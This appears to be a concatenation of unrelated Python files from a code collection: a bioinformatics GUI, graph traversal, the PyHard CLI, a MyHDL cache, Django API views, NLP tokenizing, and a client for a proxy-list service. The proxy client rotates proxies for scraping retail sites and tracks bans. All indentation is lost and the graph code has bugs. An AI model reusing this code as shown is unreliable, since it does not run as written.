def pairwise_seq():
try:
seq1 = entry_seq_dna1_pairwise.get()
seq2 = entry_seq_dna2_pairwise.get()
match_pesos= entry_match_weight_pairwise.get()
mismatch_pesos= entry_mismatch_weight_pairwise.get()
gap_abertura= entry_gap_open.get()
gap_extensao= entry_gap_extend.get()
align= pairwise2.align.globalms(seq1,seq2,match_pesos,mismatch_pesos,gap_abertura,gap_extensao)
save_pairwise = tk.Tk()
save_pairwise.withdraw()
save_pairwise.filename = filedialog.asksaveasfilename(title = "Save as ", defaultextension='.txt', filetypes = (("txt files","*.txt"),))
with open(save_pairwise.filename, "w") as save_pairwise_out:
save_pairwise_out.write(pairwise2.format_alignment(*align[0]))
return (pairwise2.format_alignment(*align[0]))
except:
tkinter.messagebox.showerror('Error', 'Not a valid sequence or values\nUse dot instead of comma')
def clear_pairwise():
entry_seq_dna1_pairwise.delete(0, 'end')
entry_seq_dna2_pairwise.delete(0, 'end')
entry_match_weight_pairwise.delete(0, 'end')
entry_mismatch_weight_pairwise.delete(0, 'end')
entry_gap_open.delete(0, 'end')
entry_gap_extend.delete(0, 'end')
def pairwise_default_seq(match_pesos=5,mismatch_pesos=-4,gap_abertura=-2,gap_extensao=-0.5):
try:
seq1 = entry_seq_dna1_pairwise.get()
seq2 = entry_seq_dna2_pairwise.get()
align= pairwise2.align.globalms(seq1,seq2,match_pesos,mismatch_pesos,gap_abertura,gap_extensao)
save_pairwise_def = tk.Tk()
save_pairwise_def.withdraw()
save_pairwise_def.filename = filedialog.asksaveasfilename(title = "Save as ", defaultextension='.txt', filetypes = (("txt files","*.txt"),))
with open(save_pairwise_def.filename, "w") as save_pairwise_def_out:
save_pairwise_def_out.write(pairwise2.format_alignment(*align[0]))
return (pairwise2.format_alignment(*align[0]))
except:
tkinter.messagebox.showerror('Error', 'Not a valid sequence')
def clear_matrix_default():
entry_prot_seq1_matrix.delete(0, 'end')
entry_prot_seq2_matrix.delete(0, 'end')
#functions matrix pairwise
def alignment_matrix():
try:
seq1 = entry_prot_seq1_matrix.get()
seq2 = entry_prot_seq2_matrix.get()
chosen = dict_matrix[chosen_matrix]
alinhamento = pairwise2.align.globaldx(seq1,seq2,chosen)
save_pairwise_prot = tk.Tk()
save_pairwise_prot.withdraw()
save_pairwise_prot.filename = filedialog.asksaveasfilename(title = "Save as ", defaultextension='.txt', filetypes = (("txt files","*.txt"),))
with open(save_pairwise_prot.filename, "w") as save_pairwise_prot_out:
save_pairwise_prot_out.write(pairwise2.format_alignment(*alinhamento[0]))
except:
tkinter.messagebox.showerror('Error', 'Not a valid sequence')
#
#buttons
button_run_dna = tk.Button(text='Run!', command=generateTTR, bg='blue', fg='white', font=('helvetica', 9, 'bold'))
canvas1.create_window(400, 140, window=button_run_dna)#
button_copy_complementary_dna = tk.Button(text='Copy!', command=copy_dnam, bg='white', fg='black', font=('helvetica', 9, 'bold'))
canvas1.create_window(400, 180, window=button_copy_complementary_dna)#copy dna complementary
button_copy_rna = tk.Button(text='Copy!', command=copy_rna, bg='white', fg='black', font=('helvetica', 9, 'bold'))
canvas1.create_window(400, 220, window=button_copy_rna)#copy rna
button_copy_seq_aa = tk.Button(text='Copy!', command=copy_seq_aa, bg='white', fg='black', font=('helvetica', 9, 'bold'))
canvas1.create_window(400, 260, window=button_copy_seq_aa)# copy seq AA
##save buttons
button_save_dnaC = tk.Button(text='Save as txt!', command=save_fasta_dnac, bg='white', fg='black', font=('helvetica', 9, 'bold'))
canvas1.create_window(480, 180, window=button_save_dnaC)# copy seq AA
bbutton_save_rna = tk.Button(text='Save as txt!', command=save_fasta_rna, bg='white', fg='black', font=('helvetica', 9, 'bold'))
canvas1.create_window(480, 220, window=bbutton_save_rna)# copy seq AA
button_save_seq_aa = tk.Button(text='Save as txt!', command=save_fasta_seq_aa, bg='white', fg='black', font=('helvetica', 9, 'bold'))
canvas1.create_window(480,260, window=button_save_seq_aa)# copy seq AA
#run and clear buttons
button_run_pairwisealignment = tk.Button(text='Run!', command=pairwise_seq, bg = 'green', fg='white', font=('helvedica',9,'bold'))
canvas1.create_window(240,555, window=button_run_pairwisealignment)
button_run_pairwisealignment_default = tk.Button(text='Run default!', command=pairwise_default_seq, bg = 'green', fg='white', font=('helvedica',9,'bold'))
canvas1.create_window(180,555, window=button_run_pairwisealignment_default)
button_clear_pairwisealignment_default = tk.Button(text='Clear fields', command=clear_pairwise, bg = 'green', fg='white', font=('helvedica',9,'bold'))
canvas1.create_window(100,555, window=button_clear_pairwisealignment_default)
button_run_matrix_alignment = tk.Button(text='Run!', command=alignment_matrix, bg = 'green', fg='white', font=('helvedica',9,'bold'))
canvas1.create_window(530,460, window=button_run_matrix_alignment)
button_clear_matrix_alignment = tk.Button(text='Clear fields', command=clear_matrix_default, bg = 'green', fg='white', font=('helvedica',9,'bold'))
canvas1.create_window(470,460, window=button_clear_matrix_alignment)
root.mainloop()
|
15,917 | 23846d7ee46b5179d47df2a212b1232419786abc | students = [
{'name': 'Rezso', 'age': 9.5, 'candies': 2},
{'name': 'Gerzson', 'age': 10, 'candies': 1},
{'name': 'Aurel', 'age': 7, 'candies': 3},
{'name': 'Zsombor', 'age': 12, 'candies': 5}
]
def many_candies():
for i in students:
if i["candies"] > 4:
print(i["name"] + " has more, than four candies.")
def ave():
y = 0
for i in students:
y += i["candies"]
y = y/(len(students))
print(y)
many_candies()
ave() |
15,918 | 66a7f931409aed302bce698737d190053f870d0f | class Graph:
def __init__(self, graphDictionary = None):
if graphDictionary is None:
graphDictionary = {}
self.graphDictionary = graphDictionary
def getVertices(self):
return list(self.graphDictionary.keys())
def edges(self):
return self.findEdges()
def findEdges(self):
edgeName = []
for vertex in self.graphDictionary:
for nextVertex in self.graphDictionary[vertex]:
if {nextVertex, vertex} not in edgeName:
edgeName.append({vertex, nextVertex})
return edgeName
def addVertex(self, vertex):
if vertex not in self.graphDictionary:
self.graphDictionary[vertex] = {}
def addEdge(self, edge):
edge = set(edge)
(vertex1, vertex2) = tuple(edge)
if vertex1 in self.graphDictionary:
self.graphDictionary[vertex].append(vertex2)
else:
self.graphDictionary[vertex1] = [vertex2]
def depthFirstSearch(self, start,visited = set()):
if start not in visited:
print(start)
visited.add(start)
for neighbour in self.graphDictionary[start]:
self.depthFirstSearch(neighbour)
def breadthFirstSearch(self, start):
visited = set()
queue = []
visited.add(start)
queue.append(start)
while queue:
firstQueueItem = queue.pop(0)
print(firstQueueItem, end=' ')
for neighbour in self.graphDictionary[firstQueueItem]:
if neighbour not in visited:
visited.add(neighbour)
queue.append(neighbour)
graphElements = {
"a" : ["b", "c"],
"b" : ["d", "e"],
"c" : ["f"],
"d" : [],
"e" : ["f"],
"f" : [],
}
graph = Graph(graphElements)
# print(graph.getVertices())
# print(graph.findEdges())
# print(graph.depthFirstSearch('a'))
print(graph.depthFirstSearch('a'))
print(graph.breadthFirstSearch('a')) |
15,919 | 107fc08ab288fe2258f92e73b997b17bf8be0d26 | import sys
import argparse
import logging
import shutil
import time
import os
from inspect import signature, Parameter
from pathlib import Path
import pandas as pd
from pyispace.example import save_opts
from pyispace.trace import trace_build_wrapper, make_summary, _empty_footprint
from pyispace.utils import save_footprint, scriptcsv
from . import integrator, formatter
from .context import Configuration, Workspace
from .feature_selection import featfilt
from .metrics import loss_threshold
from .visualization import Demo, AppClassification
_conf_file = 'config.yaml'
def main(args):
start = time.time()
logger = logging.getLogger(__name__)
_my_path = Path().absolute()
if args.other is None:
config_path = _my_path / _conf_file
else:
config_path = args.other
with Configuration(config_path) as conf:
logger.info(f"Configuration file: '{str(config_path)}'")
for name, path_str in conf.get(['rootdir', 'matildadir', 'datafile']).items():
if path_str is None:
continue
path = Path(path_str)
if not path.is_absolute():
abs_path = _my_path / path
abs_path = abs_path.resolve()
if abs_path.exists():
conf.set(name, str(abs_path))
else:
logger.error("Invalid '{0}': '{1}'.".format(name, abs_path))
sys.exit(1)
file_path = Path(conf.get('datafile'))
if file_path.is_file():
logger.info("Reading input dataset: '{0}'".format(file_path))
df_dataset = pd.read_csv(file_path)
else:
logger.error("Invalid datafile '{0}'.".format(file_path))
sys.exit(1)
seed = conf.get('seed')
if isinstance(seed, int):
os.environ["PYHARD_SEED"] = repr(seed)
logger.info(f"Seed={seed}")
else:
os.environ["PYHARD_SEED"] = ""
logger.info(f"Using random seed")
kwargs = conf.get_full()
rootdir_path = Path(conf.get('rootdir'))
problem = str.lower(conf.get('problem'))
if problem in {'classification', 'regression'}:
logger.info(f"Type of problem: '{problem}'")
else:
logger.error(f"Unknown problem type '{problem}'.")
sys.exit(1)
if args.meta:
logger.info("Building metadata.")
df_metadata, df_ih = integrator.build_metadata(data=df_dataset, return_ih=True,
verbose=args.verbose, **kwargs)
else:
df_metadata = pd.read_csv(rootdir_path / 'metadata.csv', index_col='instances')
df_ih = pd.read_csv(rootdir_path / 'ih.csv', index_col='instances')
if args.isa:
if conf.get('feat_select'):
n_feat_cols = len(df_metadata.filter(regex='^feature_').columns)
if n_feat_cols > conf.get('max_n_features'):
logger.info("Feature selection on")
if 'df_metadata' not in locals():
df_metadata = pd.read_csv(rootdir_path / 'metadata.csv', index_col='instances')
df_metadata.to_csv(rootdir_path / 'metadata_original.csv')
sig = signature(featfilt)
param_dict = {param.name: kwargs[param.name] for param in sig.parameters.values()
if param.kind == param.POSITIONAL_OR_KEYWORD and param.default != Parameter.empty and
param.name in kwargs}
selected, df_metadata = featfilt(df_metadata, **param_dict)
logger.info("Selected features: {0}".format(selected))
df_metadata.to_csv(rootdir_path / 'metadata.csv')
else:
logger.info("Skipping feature selection: "
"number of features already satisfied "
f"({n_feat_cols} <= max_n_features ({conf.get('max_n_features')}))")
else:
logger.info("Feature selection off")
isa_engine = str.lower(conf.get('isa_engine'))
logger.info(f"Running Instance Space Analysis with {repr(isa_engine)} engine.")
if isa_engine == 'python':
# changes ISA 'perf':'epsilon' option
epsilon = conf.get('perf_threshold')
if epsilon == 'auto':
n_classes = df_dataset.iloc[:, -1].nunique()
epsilon = loss_threshold(n_classes, metric=conf.get('metric'))
other = {'perf': {'epsilon': epsilon}}
model = integrator.run_isa(rootdir=rootdir_path, metadata=df_metadata, settings=other,
rotation_adjust=conf.get('adjust_rotation'), save_output=False)
threshold = conf.get('ih_threshold')
pi = conf.get('ih_purity')
logger.info("Calculating instance hardness footprint area")
logger.info(f"An instance is easy if its IH-value <= {threshold}")
Ybin = df_ih.values[:, 0] <= threshold
ih_fp = trace_build_wrapper(model.pilot.Z, Ybin, pi)
# Calculate IH summary
ih_summary = make_summary(space=model.trace.space, good=[ih_fp], best=[_empty_footprint()],
algolabels=['instance_hardness'])
model.trace.summary = model.trace.summary.append(ih_summary)
# Save footprints and models
save_footprint(ih_fp, rootdir_path, 'instance_hardness')
scriptcsv(model, rootdir_path)
elif isa_engine == 'matlab':
_ = integrator.run_matilda(metadata=df_metadata, rootdir=conf.get('rootdir'),
matildadir=conf.get('matildadir'))
elif isa_engine == 'matlab_compiled':
integrator.run_matilda_module(rootdir=rootdir_path)
else:
logger.error(f"Unknown ISA engine '{repr(isa_engine)}'.")
sys.exit(1)
if args.app:
logging.getLogger().setLevel(logging.WARNING)
ws = Workspace(rootdir_path, file_path)
ws.load()
if problem == 'classification':
app = AppClassification(ws)
elif problem == 'regression':
# app = AppRegression(ws)
raise NotImplementedError("Regression problems not yet supported. Coming soon!")
app.show(port=5001, show=args.browser)
end = time.time()
elapsed_time = end - start
if elapsed_time < 60:
logger.info(f"Total elapsed time: {elapsed_time:.1f}s")
else:
logger.info(f"Total elapsed time: {int(elapsed_time//60)}m{int((elapsed_time/60 - elapsed_time//60)*60)}s")
logger.info("Instance Hardness analysis finished.")
sys.exit(0)
def cli():
parser = argparse.ArgumentParser(description="PyHard - Python Instance Hardness Framework. \n"
"If you find a bug, please open an issue in our repo: "
"https://gitlab.com/ita-ml/pyhard/-/issues")
parser.add_argument('-F', '--files', dest='generate', action='store_true', default=False,
help="generate configuration files locally")
parser.add_argument('--app', dest='app', action='store_true', default=False,
help="run app to visualize data")
parser.add_argument('--demo', dest='demo', action='store_true', default=False,
help="run demo for toy datasets")
parser.add_argument('--no-meta', dest='meta', action='store_false',
help="does not generate a new metadata file; uses previously saved instead")
parser.add_argument('--no-isa', dest='isa', action='store_false',
help="does not execute the instance space analysis")
parser.add_argument('-v', '--verbose', dest='verbose', action='store_true', default=False,
help="verbose mode")
parser.add_argument('--no-browser', dest='browser', action='store_false', default=True,
help="run app without opening browser")
parser.add_argument('-c', '--config', dest='other', default=None, required=False,
metavar='FILE', help="specifies a path to a config file other than default")
args = parser.parse_args()
print("run 'pyhard --help' to see all options.")
sh = logging.StreamHandler()
if args.verbose:
sh.setLevel(logging.DEBUG)
else:
sh.setLevel(logging.INFO)
sh.setFormatter(formatter)
logging.getLogger().addHandler(sh)
if args.demo:
print("Press ^C to exit demo")
demo = Demo()
pane = demo.display()
pane.servable()
pane.show(title="Demo", port=5001, websocket_origin=['127.0.0.1:5001', 'localhost:5001']) # threaded=True
elif args.app:
print("Press ^C to exit app")
args.isa = False
args.meta = False
main(args)
elif args.generate:
src = Path(__file__).parent
dest = Path().absolute()
shutil.copy(src / f'conf/{_conf_file}', dest)
save_opts(dest)
print("Default config files generated!")
else:
logging.getLogger().setLevel(logging.INFO)
main(args)
|
15,920 | 747e8f0aaa5ee872bcc56f78e5793cec1f63d4fc | #Input : {“Gfg” : [4, 7, 5], “Best” : [8, 6, 7], “is” : [9, 3, 8]}, K = 2
#Output : [5, 7, 8]
from operator import itemgetter
input = {"gfg" : [4, 7, 5], "best" : [8, 6, 7], "abc" : [9, 3, 8]}
k=0
final=[]
for ind,val in enumerate(input.values()):
print(ind,val)
final.append(val[k])
print(final)
"""
other method:1
res = list(map(itemgetter(k), input.values()))
print(res)
other method:2
res = [sub[k] for sub in input.values()]
print(res)
"""
|
15,921 | 05c913aa2227e64c1166fcf18c2583ddf835511e | """
Bonfire Core Cache
(c) 2019,2020 The Bonfire Project
License: See LICENSE
"""
from myhdl import Signal,intbv,modbv, concat, \
block,always_comb,always_seq, always, instances, enum, now
from rtl.util import int_log2
import rtl.cache.cache_way as cache_way
from rtl.cache.config import CacheConfig
from rtl.cache.cache_ram import CacheRAMBundle,cache_ram_instance
from rtl.cache.cache_businterface import BusOutputBundle, BusInputBundle, cache_dbslave_connect
from rtl.bonfire_interfaces import Wishbone_master_bundle
class CacheControlBundle:
def __init__(self):
self.invalidate = Signal(bool(0)) # Trigger invalidation of the Cache
self.invalidate_ack = Signal(bool(0)) # Asserted for one cycle when invalidation is complete
# TODO: Add other control lines
class CacheMasterWishboneBundle(Wishbone_master_bundle):
def __init__(self,config=CacheConfig()):
Wishbone_master_bundle.__init__(self,
adrHigh=32,
adrLow=int_log2(config.master_width_bytes),
dataWidth=config.master_data_width,
b4_pipelined=False,
bte_signals=True)
@block
def cache_instance(db_slave,master,clock,reset,config=CacheConfig()):
"""
slave : DbusBundle - slave interface connected to the "CPU side" of the cache
master: CacheMasterWishboneBundle - master interface connected to the "outer memory"
control: CacheControlBundle - interface for cache control
"""
# Checks
assert config.num_ways == 1, "Cache Instance, currently only 1 way implemented"
#assert config.master_data_width == master.xlen, "Master Bus Width must be equal config.master_data_width"
# State engine
t_wbm_state = enum('wb_idle','wb_burst_read','wb_burst_write','wb_finish','wb_retire')
wbm_state = Signal(t_wbm_state.wb_idle)
cache_offset_counter = Signal(modbv(0)[config.cl_bits:])
master_offset_counter = Signal(modbv(0)[config.cl_bits:])
slave_cache_we = Signal(bool(0))
# Slave Interface
bus_input = BusInputBundle(config,db_slave.xlen)
bus_output = BusOutputBundle(config,db_slave.xlen)
# Splitted slave adr
slave_adr_splitted = cache_way.AddressBundle(config)
s_adr_i = slave_adr_splitted.from_bit_vector(bus_input.slave_adr_slice)
# Enable signal for master Wishbone bus
wbm_enable = Signal(bool(0))
# Cache RAM
cache_ram = CacheRAMBundle(config)
c_r_i = cache_ram_instance(cache_ram,clock)
if config.num_ways == 1:
tag_control = cache_way.CacheWayBundle(config)
tc_i = cache_way.cache_way_instance(tag_control,clock,reset)
else:
pass # TODO: Add support for num_ways > 1
s_i = cache_dbslave_connect(db_slave,bus_input,bus_output,tag_control.hit,clock,reset,config)
# @always(clock.posedge)
# def debug_output():
# if slave.en_o and tag_control.hit and not slave_rd_ack:
# print("@{} Cache hit for address: {}, cache RAM adr:{}".format(now(),slave_adr_slice,cache_ram.slave_adr))
# assert tag_control.buffer_index == slave_adr_splitted.tag_index, "Tag Index mismatch"
# slave_adr_splitted.debug_print()
# Cache RAM Bus Multiplexers
if config.mux_size == 1:
@always_comb
def db_mux_1():
cache_ram.slave_db_wr.next = bus_input.slave_write
cache_ram.slave_we.next = bus_input.slave_we
bus_output.slave_read.next = cache_ram.slave_db_rd
cache_ram.slave_adr.next = concat(slave_adr_splitted.tag_index,slave_adr_splitted.word_index)
else:
# Calcluate slave bus address bits for selecting the right 32 slice
# from the master bus
mx_low = 0
mx_high = mx_low + int_log2(config.mux_size)
slave_db_mux_reg = Signal(modbv(0)[int_log2(config.mux_size):])
# Calculate bit range from word_index to select the cache word of a line in cache ram
wi_low = mx_high
wi_high = wi_low + config.cl_bits
@always(clock.posedge)
def db_mux_sync():
if tag_control.hit and bus_input.slave_en:
slave_db_mux_reg.next = bus_input.slave_adr_slice[mx_high :mx_low]
@always_comb
def db_mux_n():
# Data bus multiplexer
bus_output.slave_read.next = 0 # Avoid latch
for i in range(0,config.mux_size):
if slave_db_mux_reg == i:
# Databus Multiplexer, select the 32 Bit word from the cache ram word.
bus_output.slave_read.next = cache_ram.slave_db_rd[(i+1)*32:(i*32)]
cache_ram.slave_db_wr.next = 0
for i in range(0,config.mux_size):
# For writing the Slave bus can just be demutiplexed n times
# Write Enable is done on byte lane level
cache_ram.slave_db_wr.next[(i+1)*32:i*32] = bus_input.slave_write
# Write enable line multiplexer
if bus_input.slave_adr_slice[mx_high :mx_low] == i:
cache_ram.slave_we.next[(i+1)*4:i*4] = bus_input.slave_we
else:
cache_ram.slave_we.next[(i+1)*4:i*4] = 0
# Slave address bus
cache_ram.slave_adr.next = concat(slave_adr_splitted.tag_index,slave_adr_splitted.word_index[wi_high:wi_low])
@always_comb
def proc_slave_write_enable():
if bus_input.slave_en and bus_input.slave_we != 0 and tag_control.hit:
slave_cache_we.next = True # slave.en_o and slave.we_o != 0 and tag_control.hit
else:
slave_cache_we.next = False
@always_comb
def cache_control_comb():
# Tag Control
tag_control.en.next = bus_input.slave_en
tag_control.we.next = (master.wbm_ack_i and wbm_state==t_wbm_state.wb_finish) or slave_cache_we
tag_control.dirty.next = slave_cache_we
tag_control.valid.next = not tag_control.dirty_miss
tag_control.adr.next = bus_input.slave_adr_slice
# Cache RAM control signals
# Slave side
cache_ram.slave_en.next = tag_control.hit and bus_input.slave_en
# Master side
cache_ram.master_en.next = ( master.wbm_ack_i and wbm_enable ) or \
( tag_control.dirty_miss and wbm_state == t_wbm_state.wb_idle )
cache_ram.master_we.next = master.wbm_ack_i and not tag_control.dirty_miss
cache_ram.master_db_wr.next = master.wbm_db_i
if tag_control.dirty_miss:
cache_ram.master_adr.next = concat(tag_control.buffer_index,cache_offset_counter)
else:
cache_ram.master_adr.next = concat(tag_control.tag_index,master_offset_counter)
# Master bus
master.wbm_cyc_o.next = wbm_enable
master.wbm_stb_o.next = wbm_enable
master.wbm_db_o.next = cache_ram.master_db_rd
@always_comb
def proc_master_adr():
if tag_control.dirty_miss:
master.wbm_adr_o.next = concat(tag_control.tag_value,
tag_control.buffer_index,master_offset_counter)
else:
master.wbm_adr_o.next = concat(slave_adr_splitted.tag_value,
slave_adr_splitted.tag_index,
master_offset_counter)
# State engine for cache refill/writeback
@always_seq(clock.posedge,reset)
def master_rw():
if wbm_state == t_wbm_state.wb_idle:
if tag_control.miss and not tag_control.hit:
wbm_enable.next = True
for i in range(0,len(master.wbm_sel_o)):
master.wbm_sel_o.next[i] = True
master.wbm_cti_o.next = 0b010
master.wbm_bte_o.next = 0b00
if tag_control.dirty_miss:
cache_offset_counter.next = master_offset_counter + 1
master.wbm_we_o.next = True
wbm_state.next = t_wbm_state.wb_burst_write
else:
master.wbm_we_o.next = False
wbm_state.next = t_wbm_state.wb_burst_read
elif wbm_state == t_wbm_state.wb_burst_read or wbm_state == t_wbm_state.wb_burst_write:
n = master_offset_counter + 1
if master.wbm_ack_i:
if n == master_offset_counter.max-1:
master.wbm_cti_o.next = 0b111
wbm_state.next = t_wbm_state.wb_finish
master_offset_counter.next = n
cache_offset_counter.next = n + 1
elif wbm_state == t_wbm_state.wb_finish:
if master.wbm_ack_i:
wbm_enable.next = False
master.wbm_we_o.next = False
master_offset_counter.next = 0
cache_offset_counter.next = 0
wbm_state.next = t_wbm_state.wb_retire
else:
assert wbm_state == t_wbm_state.wb_retire
wbm_state.next = t_wbm_state.wb_idle
return instances() |
15,922 | cc7465e3e3357d1524c576ed19071b092f30e76a | # Copyright: 2019, NLnet Labs and the Internet.nl contributors
# SPDX-License-Identifier: Apache-2.0
import json
from django.http import HttpResponseRedirect
from django.views.decorators.http import require_http_methods
from .util import check_valid_user, batch_async_generate_results
from .util import get_site_url, APIMetadata, list_requests
from .util import register_request, get_request, patch_request
from .responses import api_response, unknown_request_response
from .responses import invalid_url_response, bad_client_request_response
from .responses import general_server_error_response
from .. import simple_cache_page
from ..models import BatchRequest
from ..models import BatchRequestStatus
@require_http_methods(['GET', 'POST'])
@check_valid_user
def endpoint_requests(request, *args, **kwargs):
if request.method == "GET":
return list_requests(request, *args, **kwargs)
else:
return register_request(request, *args, **kwargs)
@require_http_methods(['GET', 'PATCH'])
@check_valid_user
def endpoint_request(request, request_id, *args, **kwargs):
user = kwargs['batch_user']
try:
batch_request = BatchRequest.objects.get(
user=user, request_id=request_id)
except BatchRequest.DoesNotExist:
return unknown_request_response()
if request.method == "GET":
return get_request(request, batch_request, user)
elif request.method == "PATCH":
return patch_request(request, batch_request)
def results(request, request_id, *args, technical=False, **kwargs):
user = kwargs['batch_user']
try:
batch_request = BatchRequest.objects.get(
user=user, request_id=request_id)
except BatchRequest.DoesNotExist:
return unknown_request_response()
if batch_request.status != BatchRequestStatus.done:
return bad_client_request_response("The request is not yet `done`.")
else:
if not batch_request.has_report_file():
batch_async_generate_results.delay(
user=user,
batch_request=batch_request,
site_url=get_site_url(request))
return bad_client_request_response(
"The request is not yet `done`.")
else:
report_file = batch_request.get_report_file(technical)
try:
report_file.open('r')
data = json.load(report_file)
except Exception:
return general_server_error_response(
"Report could not be generated.")
finally:
report_file.close()
return api_response(data)
@require_http_methods(['GET'])
@check_valid_user
def endpoint_results(request, request_id, *args, **kwargs):
return results(request, request_id, *args, **kwargs)
@require_http_methods(['GET'])
@check_valid_user
def endpoint_results_technical(request, request_id, *args, **kwargs):
return results(request, request_id, *args, technical=True, **kwargs)
@require_http_methods(['GET'])
@check_valid_user
def endpoint_metadata_report(request, *args, **kwargs):
return api_response({"report": APIMetadata.get_report_metadata()})
@require_http_methods(['GET'])
def documentation(request, *args, **kwargs):
return HttpResponseRedirect('/static/openapi.yaml')
@check_valid_user
def old_url(request, *args, **kwargs):
return invalid_url_response()
|
15,923 | 6c1115cec25714a0a7c9f7ac953e12b747d8a8f5 | import sys, traceback
import json
from NLP.Utils.TextUtilities import fix_bad_unicode_textacy as fix_bad_unicode
from NLP.Utils.Words import Words
from NLP.Utils.text_normalization import plain_text_abstract
class NlpProc():
def __init__(self):
self._nlp = None
self.language = 'en'
@property
def nlp(self):
if self._nlp is None:
from NLP.nlp import NLP
self._nlp = NLP.nlp(self.language)
assert self.nlp is not None
return self._nlp
def get_language_from_object(self, odata):
""" Gets language from given mongo object of content
If not found, returns language as 'en'
Args:
odata: mongo object of content
Returns: language from mongo object
"""
try:
if odata.get('lxp', {}).get('language', None):
language = odata['lxp']['language']
elif odata.get('meta', {}).get('ecl', {}).get('lang', None):
language = odata['meta']['ecl']['lang']
else:
language = 'en'
except (AttributeError, KeyError):
print("Exception getting language")
language = 'en'
return language
def _tokenize(self, text, language, stemming=False,remove_stops=True,split=True,lemmatize=True):
""" refactored to preserve tokenized sentences
Test case fail L'objectif de l'ex GDF-Suez est de 2.200 MWc installés à l'horizon 2021.
"""
special = {'fr': 'dans y'.split(' ')} # why not add to fr stops?
spec = special.get(language, [])
text = fix_bad_unicode(text.encode("utf-8").decode("utf-8"))
sentences = self.nlp.sentence_tokenize(text.lower())
cleaned_sentences = []
for sentence in sentences:
if lemmatize:
lookup = dict([[x.text.lower(), x.lemma_] for x in sentence if
x.text.lower() not in spec]) # fixes L'
lemmatized_text = ' '.join(
[lookup.get(x.text.lower(), x.text.lower()) for x in sentence if not (x.is_space or x.is_punct)])
else:
lemmatized_text = ' '.join([x.text.lower() for x in sentence if not (x.is_space or x.is_punct)])
normed = (Words.normalizeTextNew(lemmatized_text, removeRefs=False, remove_stops=remove_stops, lower=False,
split=split, language=language))
cleaned_sentences.append(normed)
if stemming:
cleaned_sentences = [self.stemmer(language=language).stemWords(sentence) for sentence in cleaned_sentences]
return cleaned_sentences # backwards compatability
def perform_nlp(self, oid, odata, stemming=False, named_entities=False,
remove_stops=True, lemmatize = True):
""" """
try:
item = {}
odata = json.loads(odata)
text = odata.get('excerpt') or odata.get('lxp', {}).get('description')
#get content language
language = self.get_language_from_object(odata)
if not text:
print('no excerpt for keys %s' % (oid))
return None
plain_text = plain_text_abstract(text)
item['sentences'] = self._tokenize(plain_text, language=language, stemming=stemming,
remove_stops=remove_stops, split=True,lemmatize = lemmatize)
if named_entities:
""" generates list of entities for each type"""
try:
ent_kinds = ['PERSON', 'ORG','WORK_OF_ART', 'PRODUCT','EVENT']
entities = {}
text = str(plain_text)
doc = self.nlp(text) or []
for ent in doc.ents:
if ent.label_ in ent_kinds:
ne = ent.text.replace('\n','')
ents = entities.setdefault(ent.label_, [])
ents.append(ne)
item['ents'] = entities
except Exception as error:
print('>>>entity_exception %s',error)
return None
except Exception as error:
print(error)
exc_type, exc_value, exc_traceback = sys.exc_info()
print('TRACE %s' % (repr(traceback.format_tb(exc_traceback))))
return None
print(item)
return oid, json.dumps(item)
|
15,924 | 4f3442e03f199088f686f655643cd80df74d3f60 | #!/usr/bin/env python
'''
This file includes examples of how to use the API. You will have to obtain your own API Key to use the API.
The API Key must be put in the request header of all requests to the API. There are two main ways to use
the API-- the first is to retrieve proxies, and teh second is to report their success. Please be sure to
try and follow through by reporting successes and failures of proxies you retrieve. Proxy data in the under-
lying database starts with a very low success rate, and then the success rate of proxies increases as users
vet proxies and report their results-- reported successes will give proxies a higher score, and reported
failures will lower the score, until the system decides that it's safe to say the proxy is not going to work
and disables it.
IMPORTANT-- You will see that you have the option to specify the site you are using, or to omit that information.
When reporting successes and failures, if you specify the website, the failure will only be registered for that
site alone. So a site that is reported to have failed 10 times for lowes.com may still be considered valid for
bestbuy.com, since you really aren't sure that it doesn't work for bestbuy.com until you try it. If the proxy
has found to fail for many sites repetitively, the system will eventually realize taht it's just not working for
any site at all and disable it. However, if you omit the website when reporting successes/failures, this counts
against the proxy itself (for all websites), which has a much more far-reaching impact. So keep this in mind
when deciding whether or not to report the website when reporting successes/failures. It will ultimately come
down to whether or not you are confident that the failure was a result of the proxy in general or something
specific about the website.
Lastly note that this is running on a gen2 core i5 PC with a spinning drive sitting in my basement. It's used for
other things too, and it often restarts itself and is offline for short periods of time-- also performance is probably
going to underwhelm a little. I would recommend taking the approach of using the API to retrieve batches of proxies
and store them locally for use instead of relying on this API to be online and performant at the moment you
need to use the proxy. I also may have to throttle proxy requests per hour to reduce the amount of database
queries-- 1 request for 100 proxies would be preferable to 100 requests for 1 proxy each, but I wouldn't bend
over backwards to accomplish it this way if it's an issue for you.
'''
import requests
import json
# How to configure session to use API Key
headers = {
'APIKey': 'c9a12ad3-025c-4cf6-a454-f163e75dc205' # Use your API key. This one will be invalid.
}
session = requests.session()
session.headers = headers
# How to use the API to retrieve 2 proxies for lowes.com
response = session.get("http://url.here/api/proxy/list/lowes.com/2")
# Note that the quantity provided may fall short of what was requested by up to 50%,
# but should usually match or be within 10%
if (response.status_code == 403):
print("Authentication Error. API Key was probably wrong or missing.")
elif (response.status_code == 200):
for proxy in json.loads(response.text):
url = proxy["url"]
print(url)
'''
Unvetted Proxy Example:
{
'proxyID': 1031247, -- The ID used for this proxy in the API
'url': 'http://91.150.67.210:55318', -- Proxy Location
'proxyScore': 0, -- Proxy Score (higher is better).\
-- "0" probably means that this proxy has not been tested yet.
'country': 'Serbia', -- Country of Proxy (not always correct in practice)
'streak': 0, -- How many consecutive successes has this proxy had?
'site': None, -- The site that this proxy's site score is for.\
"None" means the proxy hasn't been tested against the requested site yet.
'siteScore': None, -- The proxy's score for the given site (higher is better).\
"None" means the proxy hasn't been tested against the requested site yet.
'source': 'my list', -- The site, API, etc. that provided the API with the proxy's location
'siteVetted': False -- True if this proxy has been tested against the given site, false if it hasn't been tested yet.
}
Vetted Proxy Example:
'proxyID': 98797,
'url': 'http://186.47.62.94:44892',
'proxyScore': 3, -- score of 3 for proxy as a whole
'country': 'Ecuador',
'streak': -1,
'site': 'lowes.com',
'siteScore': 18, -- site score of 18 for lowes.com
'source': 'my list',
'siteVetted': True
'''
# How to contribute to the database by indicating if a proxy is working or not.
session.headers = {
'Content-type' : 'application/json',
'APIKey': 'c9a12ad3-025c-4cf6-a454-f163e75dc205', # Use your API key. This one will be invalid.
}
json_data = ("{'site' : 'lowes.com', " # The site all of the successes/failures are being reported for. You can
# omit this if you are not tracking it, though it is most useful to have.
"'successes' : 5, " # Indicate that the proxy has succeeded 5 times.
"'failures' : 1, " # Indicate that the proxy failed 1 time.
"'banned' : 'False'} " ) # Set this to true if you know the proxy is banned for the provided site.
